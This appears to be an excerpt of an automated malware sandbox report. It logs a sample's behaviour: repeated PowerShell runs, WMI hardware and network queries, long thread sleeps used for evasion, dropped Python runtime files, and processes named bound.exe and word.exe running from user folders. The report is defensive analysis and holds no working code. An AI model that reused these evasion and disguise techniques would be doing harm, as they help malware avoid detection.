                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                      Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                      Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeMemory allocated: B40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeMemory allocated: 1A5C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 1350000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 1B1B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: C30000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 1A9A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 1200000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 1ABD0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 3020000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 1B060000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 10A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 1AE40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 1460000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 1AFE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 15D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 1B1A0000 memory reserve | memory write watch
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\word.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\word.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\word.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\word.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\word.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\word.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\word.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2496Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3370Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeWindow / User API: threadDelayed 4609
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeWindow / User API: threadDelayed 4909
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2520
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2764
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 647
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5358
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5830
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 498
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3319
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2902
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 788
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3984
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI58162\_queue.pydJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI58162\_lzma.pydJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI58162\unicodedata.pydJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI58162\_socket.pydJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.dllJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI58162\_hashlib.pydJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI58162\_decimal.pydJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI58162\_bz2.pydJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI58162\select.pydJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI58162\_sqlite3.pydJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI58162\python312.dllJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI58162\_ssl.pydJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI58162\_ctypes.pydJump to dropped file
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17362
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeAPI coverage: 4.8 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep count: 2496 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516Thread sleep count: 143 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7364Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560Thread sleep count: 3370 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep count: 135 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 8716Thread sleep time: -15679732462653109s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576Thread sleep count: 2520 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7572Thread sleep count: 2764 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7572Thread sleep count: 47 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8104Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8140Thread sleep count: 647 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4564Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8160Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7832Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7368Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\word.exe TID: 9076Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8604Thread sleep count: 5358 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8696Thread sleep time: -10145709240540247s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8600Thread sleep count: 341 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8672Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8340Thread sleep count: 5830 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8340Thread sleep count: 498 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8252Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8748Thread sleep count: 3319 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8980Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8760Thread sleep count: 84 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 180Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\word.exe TID: 9024Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\word.exe TID: 7592Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep count: 2902 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep count: 788 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9052Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6980Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7416Thread sleep count: 3984 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep count: 147 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8228Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\word.exe TID: 9084Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\word.exe TID: 8996Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\word.exe TID: 7412Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\word.exe TID: 7340Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
